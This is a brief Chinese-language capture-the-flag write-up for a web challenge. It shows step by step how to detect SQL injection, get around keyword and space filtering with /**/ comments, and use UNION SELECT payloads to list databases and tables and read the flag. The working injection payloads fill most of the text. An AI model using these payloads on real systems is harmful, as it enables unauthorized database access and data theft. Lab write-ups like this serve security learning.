解题链接: http://ctf5.shiyanbar.com/423/web/
解题思路:一, 输入1,不报错;输入1\',报错;输入1\'\',不报错。
二 , 输入1 and 1=1,返回1 1=1,可知,and被过滤了。
三, 输入1 union select,返回1 select,猜测关键词被过滤。
四, 用/**/代替空格,爆库:1\'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/\'1\'=\'1。
五, 爆表:1\'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/\'1\'=\'1。
六, 最后一步:1\'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/\'1\'=\'1。